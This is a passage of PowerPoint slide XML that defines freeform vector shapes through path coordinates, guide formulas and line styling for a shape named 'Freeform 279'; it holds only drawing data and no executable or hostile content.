                      <a:pt x="185" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="171"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36146" name="Freeform 279"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2818" y="672"/>
                <a:ext cx="414" cy="1139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 224 w 414"/>
                  <a:gd name="T1" fmla="*/ 45 h 1139"/>
                  <a:gd name="T2" fmla="*/ 280 w 414"/>
                  <a:gd name="T3" fmla="*/ 35 h 1139"/>
                  <a:gd name="T4" fmla="*/ 314 w 414"/>
                  <a:gd name="T5" fmla="*/ 25 h 1139"/>
                  <a:gd name="T6" fmla="*/ 323 w 414"/>
                  <a:gd name="T7" fmla="*/ 113 h 1139"/>
                  <a:gd name="T8" fmla="*/ 99 w 414"/>
                  <a:gd name="T9" fmla="*/ 1105 h 1139"/>
                  <a:gd name="T10" fmla="*/ 86 w 414"/>
                  <a:gd name="T11" fmla="*/ 1092 h 1139"/>
                  <a:gd name="T12" fmla="*/ 69 w 414"/>
                  <a:gd name="T13" fmla="*/ 1112 h 1139"/>
                  <a:gd name="T14" fmla="*/ 31 w 414"/>
                  <a:gd name="T15" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T16" fmla="*/ 10 w 414"/>
                  <a:gd name="T17" fmla="*/ 1124 h 1139"/>
                  <a:gd name="T18" fmla="*/ 16 w 414"/>
                  <a:gd name="T19" fmla="*/ 1111 h 1139"/>
                  <a:gd name="T20" fmla="*/ 20 w 414"/>
                  <a:gd name="T21" fmla="*/ 1099 h 1139"/>
                  <a:gd name="T22" fmla="*/ 11 w 414"/>
                  <a:gd name="T23" fmla="*/ 1095 h 1139"/>
                  <a:gd name="T24" fmla="*/ 6 w 414"/>
                  <a:gd name="T25" fmla="*/ 1086 h 1139"/>
                  <a:gd name="T26" fmla="*/ 15 w 414"/>
                  <a:gd name="T27" fmla="*/ 1084 h 1139"/>
                  <a:gd name="T28" fmla="*/ 2 w 414"/>
                  <a:gd name="T29" fmla="*/ 1068 h 1139"/>
                  <a:gd name="T30" fmla="*/ 7 w 414"/>
                  <a:gd name="T31" fmla="*/ 1043 h 1139"/>
                  <a:gd name="T32" fmla="*/ 13 w 414"/>
                  <a:gd name="T33" fmla="*/ 1019 h 1139"/>
                  <a:gd name="T34" fmla="*/ 17 w 414"/>
                  <a:gd name="T35" fmla="*/ 1000 h 1139"/>
                  <a:gd name="T36" fmla="*/ 32 w 414"/>
                  <a:gd name="T37" fmla="*/ 982 h 1139"/>
                  <a:gd name="T38" fmla="*/ 63 w 414"/>
                  <a:gd name="T39" fmla="*/ 963 h 1139"/>
                  <a:gd name="T40" fmla="*/ 94 w 414"/>
                  <a:gd name="T41" fmla="*/ 924 h 1139"/>
                  <a:gd name="T42" fmla="*/ 110 w 414"/>
                  <a:gd name="T43" fmla="*/ 908 h 1139"/>
                  <a:gd name="T44" fmla="*/ 129 w 414"/>
                  <a:gd name="T45" fmla="*/ 871 h 1139"/>
                  <a:gd name="T46" fmla="*/ 133 w 414"/>
                  <a:gd name="T47" fmla="*/ 839 h 1139"/>
                  <a:gd name="T48" fmla="*/ 156 w 414"/>
                  <a:gd name="T49" fmla="*/ 818 h 1139"/>
                  <a:gd name="T50" fmla="*/ 171 w 414"/>
                  <a:gd name="T51" fmla="*/ 802 h 1139"/>
                  <a:gd name="T52" fmla="*/ 185 w 414"/>
                  <a:gd name="T53" fmla="*/ 783 h 1139"/>
                  <a:gd name="T54" fmla="*/ 198 w 414"/>
                  <a:gd name="T55" fmla="*/ 747 h 1139"/>
                  <a:gd name="T56" fmla="*/ 222 w 414"/>
                  <a:gd name="T57" fmla="*/ 728 h 1139"/>
                  <a:gd name="T58" fmla="*/ 243 w 414"/>
                  <a:gd name="T59" fmla="*/ 716 h 1139"/>
                  <a:gd name="T60" fmla="*/ 273 w 414"/>
                  <a:gd name="T61" fmla="*/ 692 h 1139"/>
                  <a:gd name="T62" fmla="*/ 305 w 414"/>
                  <a:gd name="T63" fmla="*/ 675 h 1139"/>
                  <a:gd name="T64" fmla="*/ 319 w 414"/>
                  <a:gd name="T65" fmla="*/ 690 h 1139"/>
                  <a:gd name="T66" fmla="*/ 352 w 414"/>
                  <a:gd name="T67" fmla="*/ 670 h 1139"/>
                  <a:gd name="T68" fmla="*/ 363 w 414"/>
                  <a:gd name="T69" fmla="*/ 677 h 1139"/>
                  <a:gd name="T70" fmla="*/ 409 w 414"/>
                  <a:gd name="T71" fmla="*/ 677 h 1139"/>
                  <a:gd name="T72" fmla="*/ 393 w 414"/>
                  <a:gd name="T73" fmla="*/ 711 h 1139"/>
                  <a:gd name="T74" fmla="*/ 396 w 414"/>
                  <a:gd name="T75" fmla="*/ 726 h 1139"/>
                  <a:gd name="T76" fmla="*/ 377 w 414"/>
                  <a:gd name="T77" fmla="*/ 713 h 1139"/>
                  <a:gd name="T78" fmla="*/ 330 w 414"/>
                  <a:gd name="T79" fmla="*/ 731 h 1139"/>
                  <a:gd name="T80" fmla="*/ 281 w 414"/>
                  <a:gd name="T81" fmla="*/ 758 h 1139"/>
                  <a:gd name="T82" fmla="*/ 247 w 414"/>
                  <a:gd name="T83" fmla="*/ 743 h 1139"/>
                  <a:gd name="T84" fmla="*/ 209 w 414"/>
                  <a:gd name="T85" fmla="*/ 765 h 1139"/>
                  <a:gd name="T86" fmla="*/ 189 w 414"/>
                  <a:gd name="T87" fmla="*/ 792 h 1139"/>
                  <a:gd name="T88" fmla="*/ 153 w 414"/>
                  <a:gd name="T89" fmla="*/ 864 h 1139"/>
                  <a:gd name="T90" fmla="*/ 144 w 414"/>
                  <a:gd name="T91" fmla="*/ 928 h 1139"/>
                  <a:gd name="T92" fmla="*/ 116 w 414"/>
                  <a:gd name="T93" fmla="*/ 957 h 1139"/>
                  <a:gd name="T94" fmla="*/ 124 w 414"/>
                  <a:gd name="T95" fmla="*/ 1033 h 1139"/>
                  <a:gd name="T96" fmla="*/ 110 w 414"/>
                  <a:gd name="T97" fmla="*/ 1081 h 1139"/>
                  <a:gd name="T98" fmla="*/ 131 w 414"/>
                  <a:gd name="T99" fmla="*/ 78 h 1139"/>
                  <a:gd name="T100" fmla="*/ 163 w 414"/>
                  <a:gd name="T101" fmla="*/ 97 h 1139"/>
                  <a:gd name="T102" fmla="*/ 180 w 414"/>
                  <a:gd name="T103" fmla="*/ 58 h 1139"/>
                  <a:gd name="T104" fmla="*/ 207 w 414"/>
                  <a:gd name="T105" fmla="*/ 117 h 1139"/>
                  <a:gd name="T106" fmla="*/ 253 w 414"/>
                  <a:gd name="T107" fmla="*/ 163 h 1139"/>
                  <a:gd name="T108" fmla="*/ 195 w 414"/>
                  <a:gd name="T109" fmla="*/ 301 h 1139"/>
                  <a:gd name="T110" fmla="*/ 167 w 414"/>
                  <a:gd name="T111" fmla="*/ 260 h 1139"/>
                  <a:gd name="T112" fmla="*/ 149 w 414"/>
                  <a:gd name="T113" fmla="*/ 225 h 1139"/>
                  <a:gd name="T114" fmla="*/ 141 w 414"/>
                  <a:gd name="T115" fmla="*/ 204 h 1139"/>
                  <a:gd name="T116" fmla="*/ 114 w 414"/>
                  <a:gd name="T117" fmla="*/ 121 h 1139"/>
                  <a:gd name="T118" fmla="*/ 123 w 414"/>
                  <a:gd name="T119" fmla="*/ 80 h 1139"/>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414"/>
                  <a:gd name="T181" fmla="*/ 0 h 1139"/>
                  <a:gd name="T182" fmla="*/ 414 w 414"/>
                  <a:gd name="T183" fmla="*/ 1139 h 1139"/>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414" h="1139">
                    <a:moveTo>
                      <a:pt x="270" y="80"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="258" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="80"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="99" y="1105"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="98" y="1103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="1104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="1104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="1090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="1100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="1105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="1114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="1122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="1133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="1133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1098"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1095"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1091"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1098"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1095"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1097"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1096"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1099"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1098"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1086"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1087"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1087"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="1086"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1082"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1084"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="1084"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1082"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1078"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1072"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1068"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1066"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1060"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1058"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1057"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1054"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1040"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="1034"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1031"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1021"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1020"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1018"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1019"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1013"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1008"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1006"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="1005"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1001"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="993"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="995"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="991"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="980"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="979"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="975"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="971"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="967"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="953"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="946"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="927"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="926"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="922"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="919"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="908"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="901"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="830"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="821"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="816"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="807"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="799"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="783"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="771"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="734"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="728"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="684"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="668"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="671"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
